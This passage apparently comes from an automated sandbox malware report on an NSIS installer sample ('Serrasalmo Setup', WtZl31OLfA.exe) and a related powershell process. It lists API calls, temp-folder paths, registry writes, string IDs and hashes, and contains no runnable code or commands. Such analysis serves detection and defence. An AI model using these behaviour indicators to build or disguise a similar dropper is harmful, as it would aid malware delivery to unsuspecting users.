                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$1033$Serrasalmo Setup
                                                                                • API String ID: 530164218-1522870003
                                                                                • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll
                                                                                • API String ID: 3109718747-3693468282
                                                                                • Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                • Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-823278215
                                                                                • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                APIs
                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                • lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID:
                                                                                • API String ID: 1356686001-0
                                                                                • Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                • Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402D9D
                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402DE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                • String ID:
                                                                                • API String ID: 2102729457-0
                                                                                • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                APIs
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 3248276644-823278215
                                                                                • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00405152
                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Free$GlobalLibrary
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 1100898210-823278215
                                                                                • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405A56
                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405A66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-1246513382
                                                                                • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$4sl$4sl$x.gk$x.gk$-gk
                                                                                • API String ID: 0-1689887990
                                                                                • Opcode ID: dbb15e12f727549210d860607f69ad5816207bf089309022a68718912f8c337b
                                                                                • Instruction ID: 0dd54f18815e4978ec71ed36b0994a1369eb58dc89c6d0e6570033bafb01342c
                                                                                • Opcode Fuzzy Hash: dbb15e12f727549210d860607f69ad5816207bf089309022a68718912f8c337b
                                                                                • Instruction Fuzzy Hash: 8D925EB4A00214DFDB64DB18CD51FAABBB2EB85344F1180E5D9095B751CB72EE81CFA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-4178824134
                                                                                • Opcode ID: 639f37ff50dda0534cadb1af5c71b163085d85f2adcccec4b0e732753d02927b
                                                                                • Instruction ID: 158bed2f3134658d28a1a577f80a34c0948a272e3a12b2eac536d4eb9b50ddbb
                                                                                • Opcode Fuzzy Hash: 639f37ff50dda0534cadb1af5c71b163085d85f2adcccec4b0e732753d02927b
                                                                                • Instruction Fuzzy Hash: 59E17DB4A102099FCB14DFA9C951FAEBBA2AFC4308F14C469D9016F795CB72ED41CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-1233961443
                                                                                • Opcode ID: e401e87fa8facec51e74c46ccec6cd7c6ad760e1752582f946804e9938e22976
                                                                                • Instruction ID: 024e7bad0708566615dc4f8d8f136ddd109ac3ab09e2f12dd69a0bf20e1ba2f6
                                                                                • Opcode Fuzzy Hash: e401e87fa8facec51e74c46ccec6cd7c6ad760e1752582f946804e9938e22976
                                                                                • Instruction Fuzzy Hash: FBC1AFB4A002099FCB14DFA9C941FAEBBB2EF88308F14C569D9056F755CB72E941CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-3655877032
                                                                                • Opcode ID: 38bbb5a867555e70136423dd709e854168f50c67c62061f44e4d70df18a22153
                                                                                • Instruction ID: e4c77c09f4bfca00d11f9efa66b7aa6b0e0a6e46a6f50253298b9ddafeb19040
                                                                                • Opcode Fuzzy Hash: 38bbb5a867555e70136423dd709e854168f50c67c62061f44e4d70df18a22153
                                                                                • Instruction Fuzzy Hash: EF425CB4A002149FDB64DF58C951FAABBB2EB85304F10C0A9D9099F756CB72ED81CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$4'eq$4'eq$4'eq
                                                                                • API String ID: 0-733111579
